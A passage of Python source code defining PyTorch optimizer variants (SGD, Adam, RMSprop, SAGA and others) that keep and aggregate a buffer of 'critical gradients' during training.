if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
self._count = 0.0
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum,
aggr=aggr, decay=decay, gradHist={}, topC=topC,
sampling=sampling, critical_test=critical_test)
super(SGD_FIFO, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_FIFO, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
self._count += 1
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
aggr = group['aggr']
sampling = group['sampling']
critical_test = group['critical_test']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = self._count
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc, sampling=sampling)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, kappa)
if crit_buf.isFull():
if critical_test:
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf[d_p_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMax().norm()
else:
self.g_analysis['gc_aggr'] += crit_buf.averageTopC()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
class Adam_FIFO(Optimizer):
"""
Implementation of Adam with critical gradients.
Uses a moving-window of length topC rather than selecting gradients based on norm
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
decay=0.7, kappa=1.0, topC=10,
weight_decay=0, amsgrad=False, aggr='mean', sampling=None,
critical_test=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
self._count = 0.0
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, aggr=aggr, amsgrad=amsgrad,
kappa=kappa, topC=topC, decay=decay, sampling=sampling,
critical_test=critical_test)
super(Adam_FIFO, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(Adam_FIFO, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
self._count += 1
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
grad_norm = self._count
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider '
'SparseAdam instead')
amsgrad = group['amsgrad']
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
sampling = group['sampling']
critical_test = group['critical_test']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc,
sampling=sampling)
state['critical gradients'][grad_norm] = deepcopy(grad)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
else:
if kappa > 0.:
aggr_grad = aggregate(grad, state['critical gradients'], aggr)
if state['critical gradients'].isFull():
if critical_test:
if grad_norm > \
state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(
grad)
else:
self.offline_grad['no'] += 1
else:
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
grad = aggr_grad
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1) # m_t
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2) # v_t
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = (max_exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
else:
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
step_size = group['lr'] / bias_correction1
self.g_analysis['gc'] += state['critical gradients'].averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMax().norm()
else:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].averageTopC()
p.addcdiv_(exp_avg, denom, value=-step_size)
return loss
class RMSprop_FIFO(Optimizer):
"""
Implementation of RMSprop with critical gradients.
Uses a moving-window of length topC rather than selecting gradients based on norm
"""
def __init__(self, params, lr=1e-2, alpha=0.99, eps=1e-8, weight_decay=0,
momentum=0, centered=False, decay=0.7, kappa=1.0,
topC=10, aggr='mean', sampling=None, critical_test=True):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= momentum:
raise ValueError("Invalid momentum value: {}".format(momentum))
if not 0.0 <= weight_decay:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
self._count = 0.0
defaults = dict(lr=lr, momentum=momentum, alpha=alpha, eps=eps,
centered=centered, weight_decay=weight_decay,
aggr=aggr, kappa=kappa, topC=topC, decay=decay)
super(RMSprop_FIFO, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(RMSprop_FIFO, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('momentum', 0)
group.setdefault('centered', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Args:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
self._count += 1
loss = None
if closure is not None:
with torch.enable_grad():
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad
grad_norm = self._count
if grad.is_sparse:
raise RuntimeError('RMSprop does not support sparse gradients')
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
state['square_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['momentum'] > 0:
state['momentum_buffer'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if group['centered']:
state['grad_avg'] = \
torch.zeros_like(p, memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
aggr_grad = aggregate(grad, state['critical gradients'], aggr)
if kappa > 0.:
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
grad = aggr_grad
square_avg = state['square_avg']
alpha = group['alpha']
state['step'] += 1
if group['weight_decay'] != 0:
grad = grad.add(p, alpha=group['weight_decay'])
square_avg.mul_(alpha).addcmul_(grad, grad, value=1 - alpha)
if group['centered']:
grad_avg = state['grad_avg']
grad_avg.mul_(alpha).add_(grad, alpha=1 - alpha)
avg = square_avg.addcmul(grad_avg, grad_avg, value=-1).sqrt_().add_(
group['eps'])
else:
avg = square_avg.sqrt().add_(group['eps'])
if group['momentum'] > 0:
buf = state['momentum_buffer']
buf.mul_(group['momentum']).addcdiv_(grad, avg)
p.add_(buf, alpha=-group['lr'])
else:
p.addcdiv_(grad, avg, value=-group['lr'])
return loss
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
class SGD_C_bottom(Optimizer):
"""
Implementation of SGD (and optionally SGD with momentum) with critical gradients.
Uses the inverse of norm as priority, turning conventional "topC" with "bottomC"
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0.,
decay=0.7, topC=10, aggr='sum', sampling=None, critical_test=True):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum,
aggr=aggr, decay=decay, gradHist={}, topC=topC,
sampling=sampling, critical_test=critical_test)
super(SGD_C_bottom, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_bottom, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
count = 0.0
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
aggr = group['aggr']
sampling = group['sampling']
critical_test = group['critical_test']
count += 0.
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = 1 / d_p.norm()
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc, sampling=sampling)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
aggr_grad = aggregate(d_p, crit_buf, aggr, kappa)
if crit_buf.isFull():
if critical_test:
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf[d_p_norm] = deepcopy(d_p)
d_p = aggr_grad
self.g_analysis['gc'] += crit_buf.averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += crit_buf.getMax().norm()
else:
self.g_analysis['gc_aggr'] += crit_buf.averageTopC()
crit_buf.decay()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
class Adam_C_bottom(Optimizer):
"""
Implementation of Adam with critical gradients.
Uses the inverse of norm as priority, turning conventional "topC" with "bottomC"
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8,
decay=0.7, kappa=1.0, topC=10,
weight_decay=0, amsgrad=False, aggr='mean'):
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
if not 0.0 <= decay and not 1.0 > decay:
raise ValueError("Invalid alpha value: {}".format(decay))
if not 0.0 <= topC:
raise ValueError("Invalid alpha value: {}".format(topC))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, aggr=aggr, amsgrad=amsgrad,
kappa=kappa, topC=topC, decay=decay)
super(Adam_C_bottom, self).__init__(params, defaults)
self.resetOfflineStats()
self.resetAnalysis()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(Adam_C_bottom, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
def getAnalysis(self):
return self.g_analysis
def resetAnalysis(self):
self.g_analysis = {'gt': 0., 'gc': 0., 'count': 0, 'gc_aggr': 0}
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
grad_norm = 1 / grad.norm()
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider '
'SparseAdam instead')
amsgrad = group['amsgrad']
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
aggr = group['aggr']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(
p.data) # memory_format=torch.preserve_format)
else:
if kappa > 0.:
aggr_grad = aggregate(grad, state['critical gradients'], aggr)
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
grad = aggr_grad
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
if group['weight_decay'] != 0:
grad = grad.add(group['weight_decay'], p.data)
# Decay the first and second moment running average coefficient
exp_avg.mul_(beta1).add_(grad, alpha=1 - beta1) # m_t
exp_avg_sq.mul_(beta2).addcmul_(grad, grad, value=1 - beta2) # v_t
if amsgrad:
# Maintains the maximum of all 2nd moment running avg. till now
torch.max(max_exp_avg_sq, exp_avg_sq, out=max_exp_avg_sq)
# Use the max. for normalizing running avg. of gradient
denom = (max_exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
else:
denom = (exp_avg_sq.sqrt() / math.sqrt(bias_correction2)).add_(
group['eps'])
step_size = group['lr'] / bias_correction1
self.g_analysis['gc'] += state['critical gradients'].averageTopC()
self.g_analysis['count'] += 1
self.g_analysis['gt'] += p.grad.data.norm()
if 'mid' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMin().norm()
elif 'median' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMedian().norm()
elif 'max' in aggr:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].getMax().norm()
else:
self.g_analysis['gc_aggr'] += state[
'critical gradients'].averageTopC()
state['critical gradients'].decay()
p.addcdiv_(exp_avg, denom, value=-step_size)
return loss
class SAGA(Optimizer):
"""Implement the SAGA optimization algorithm
Original Paper: https://arxiv.org/pdf/1407.0202.pdf
"""
def __init__(self, params, n_samples, lr=0.001):
if n_samples <= 0:
raise ValueError("Number of samples must be >0: {}".format(n_samples))
self.n_samples = n_samples
defaults = dict(lr=lr)
super(SAGA, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(SAGA, self).__setstate__(state)
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def step(self, index, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
if index < 0.0:
raise ValueError("Invalid index value: {}".format(index))
loss = None
if closure is not None:
loss = closure()
n = self.n_samples
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
device = torch.device("cuda" if torch.cuda.is_available() else "cpu")
param_state = self.state[p]
if 'gradient_buffer' not in param_state:
buf = param_state['gradient_buffer'] = torch.zeros(n,
*list(d_p.shape))
else:
buf = param_state['gradient_buffer']
saga_term = torch.mean(buf, dim=0).to(
device) # hold mean and last gradient in saga_term
g_i = torch.clone(buf[index]).detach().to(device)
saga_term.sub_(g_i)
buf[index] = torch.clone(d_p).detach()
d_p.sub_(saga_term)
p.data.add_(d_p, alpha=-group['lr'])
return loss
class SGD_new_momentum(Optimizer):
"""
Running average (non-decaying) momentum. Never used.
"""
def __init__(self, params, lr=0.001, momentum=0, dampening=0,
weight_decay=0, nesterov=False):
if momentum < 0.0:
raise ValueError("Invalid momentum value: {}".format(momentum))
if weight_decay < 0.0:
raise ValueError("Invalid weight_decay value: {}".format(weight_decay))
defaults = dict(lr=lr, momentum=momentum, dampening=dampening,
weight_decay=weight_decay, nesterov=nesterov)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD_new_momentum, self).__init__(params, defaults)
self.resetOfflineStats()
def __setstate__(self, state):
super(SGD_new_momentum, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('nesterov', False)
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
momentum = group['momentum']
dampening = group['dampening']
nesterov = group['nesterov']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(d_p).detach()
n = param_state['buffer_size'] = 1
else:
buf = param_state['momentum_buffer']
n = param_state['buffer_size']
n += 1
buf.add_(d_p, alpha=1 - dampening)
if nesterov:
d_p = d_p.add(momentum, buf)
else:
d_p = torch.clone(buf).detach()
d_p.div_(n)
p.data.add_(d_p, alpha=-group['lr'])
return loss
class SGD_C_double(Optimizer):
r"""Implements SGD (optionally with momentum) while keeping a record of critical
gradients (top C gradients by norm). Adds the sum or mean of these gradients
to the final update step such that for param p
p(t+1) = p(t) + lr * (g_t + f(g_crit))
Where f is either a sum or mean of the gradients in g_crit
Order of computing update step and updating buffer inverted,
leading to double counting.
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0., decay=0.99, nesterov=False, topC=10,
sum='sum'):
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum, sum=sum,
decay=decay, nesterov=nesterov,
gradHist={}, topC=topC)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD_C_double, self).__init__(params, defaults)
self.resetOfflineStats()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_double, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
# nesterov = group['nesterov']
topc = group['topC']
sum = group['sum']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = d_p.norm()
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
if crit_buf.isFull():
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[d_p_norm] = deepcopy(d_p)
d_p = aggregate(d_p, crit_buf, sum, kappa)
crit_buf.decay()
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
class SGD_C_Only(Optimizer):
r"""Implements SGD (optionally with momentum) while keeping a record of critical
gradients (top C gradients by norm). Replaces the gradient in conventional
SGD with either the sum or the mean of critical gradients
Replaces the aggregated gradient with only the critical gradients e.g. the current
time step gradient may not come into play
"""
def __init__(self, params, lr=0.001, kappa=1.0, dampening=0.,
weight_decay=0, momentum=0., decay=0.99, nesterov=False, topC=10,
sum='sum'):
defaults = dict(lr=lr, kappa=kappa, dampening=dampening,
weight_decay=weight_decay, momentum=momentum, sum=sum,
decay=decay, nesterov=nesterov,
gradHist={}, topC=topC)
if nesterov and (momentum <= 0 or dampening != 0):
raise ValueError("Nesterov momentum requires a momentum and zero dampening")
super(SGD_C_Only, self).__init__(params, defaults)
self.resetOfflineStats()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(SGD_C_Only, self).__setstate__(state)
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
weight_decay = group['weight_decay']
kappa = group['kappa']
dampening = group['dampening']
decay = group['decay']
momentum = group['momentum']
topc = group['topC']
sum = group['sum']
for p in group['params']:
if p.grad is None:
continue
d_p = p.grad.data
d_p_norm = d_p.norm()
crit_buf_ = None
if weight_decay != 0:
d_p = d_p.add(weight_decay, p.data)
if kappa != 0:
param_state = self.state[p]
if 'critical gradients' not in param_state:
crit_buf = param_state['critical gradients'] = priorityDict()
crit_buf.setHyper(decay_rate=decay, K=topc)
crit_buf[d_p_norm] = deepcopy(d_p)
else:
crit_buf = param_state['critical gradients']
if crit_buf.isFull():
if d_p_norm > crit_buf.pokeSmallest():
self.offline_grad['yes'] += 1
crit_buf[d_p_norm] = deepcopy(d_p)
else:
self.offline_grad['no'] += 1
else:
crit_buf[d_p_norm] = deepcopy(d_p)
if 'sum' in sum:
crit_buf_ = crit_buf.gradSum()
else:
crit_buf_ = crit_buf.gradMean()
crit_buf_.mul_(kappa)
crit_buf.decay()
d_p = crit_buf_
if momentum != 0:
param_state = self.state[p]
if 'momentum_buffer' not in param_state:
buf = param_state['momentum_buffer'] = torch.clone(
d_p).detach()
else:
buf = param_state['momentum_buffer']
buf.mul_(momentum).add_(d_p, alpha=1 - dampening)
d_p = buf
p.data.add_(d_p, alpha=-group['lr'])
return loss
class Adam_C_double(Optimizer):
r"""
Implementation of Adam with critical gradients.
Replaces current-iteration gradient in conventional PyTorch implementation with
an aggregation of current gradient and critical gradients.
Conventional Adam can be recovered by setting kappa=0.
The critical-gradient-specific keyword parameters are tuned for good
off-the-shelf performance, though additional tuning may be required for best results
Order of computing update step and updating buffer inverted, leading to double counting.
"""
def __init__(self, params, lr=1e-3, betas=(0.9, 0.999), eps=1e-8, decay=0.95,
kappa=1.0, topC=10,
weight_decay=0, amsgrad=False, sum='sum',
param_level=True): # decay=0.9
if not 0.0 <= lr:
raise ValueError("Invalid learning rate: {}".format(lr))
if not 0.0 <= eps:
raise ValueError("Invalid epsilon value: {}".format(eps))
if not 0.0 <= betas[0] < 1.0:
raise ValueError("Invalid beta parameter at index 0: {}".format(betas[0]))
if not 0.0 <= betas[1] < 1.0:
raise ValueError("Invalid beta parameter at index 1: {}".format(betas[1]))
defaults = dict(lr=lr, betas=betas, eps=eps,
weight_decay=weight_decay, sum=sum, amsgrad=amsgrad,
kappa=kappa, topC=topC, decay=decay)
super(Adam_C_double, self).__init__(params, defaults)
self.resetOfflineStats()
def getOfflineStats(self):
return self.offline_grad
def resetOfflineStats(self):
self.offline_grad = {'yes': 0, 'no': 0}
def __setstate__(self, state):
super(Adam_C_double, self).__setstate__(state)
for group in self.param_groups:
group.setdefault('amsgrad', False)
@torch.no_grad()
def step(self, closure=None):
"""Performs a single optimization step.
Arguments:
closure (callable, optional): A closure that reevaluates the model
and returns the loss.
"""
loss = None
if closure is not None:
loss = closure()
for group in self.param_groups:
for p in group['params']:
if p.grad is None:
continue
grad = p.grad.data
grad_norm = grad.norm()
if grad.is_sparse:
raise RuntimeError(
'Adam does not support sparse gradients, please consider SparseAdam instead')
amsgrad = group['amsgrad']
kappa = group['kappa']
decay = group['decay']
topc = group['topC']
sum = group['sum']
param_level = group['param_level']
state = self.state[p]
# State initialization
if len(state) == 0:
state['step'] = 0
# Exponential moving average of gradient values
state['exp_avg'] = torch.zeros_like(
p.data) # , memory_format=torch.preserve_format)
# Exponential moving average of squared gradient values
state['exp_avg_sq'] = torch.zeros_like(
p.data) # , memory_format=torch.preserve_format)
if kappa > 0.:
state['critical gradients'] = priorityDict()
state['critical gradients'].setHyper(decay_rate=decay, K=topc)
state['critical gradients'][grad_norm] = deepcopy(grad)
if amsgrad:
# Maintains max of all exp. moving avg. of sq. grad. values
state['max_exp_avg_sq'] = torch.zeros_like(
p.data) # , memory_format=torch.preserve_format)
else:
if kappa > 0.:
if state['critical gradients'].isFull():
if grad_norm > state['critical gradients'].pokeSmallest():
self.offline_grad['yes'] += 1
state['critical gradients'][grad_norm] = deepcopy(grad)
else:
self.offline_grad['no'] += 1
else:
state['critical gradients'][grad_norm] = deepcopy(grad)
exp_avg, exp_avg_sq = state['exp_avg'], state['exp_avg_sq']
if amsgrad:
max_exp_avg_sq = state['max_exp_avg_sq']
beta1, beta2 = group['betas']
state['step'] += 1
bias_correction1 = 1 - beta1 ** state['step']
bias_correction2 = 1 - beta2 ** state['step']
if kappa > 0. and not param_level:
grad = aggregate(grad, state['critical gradients'], sum)
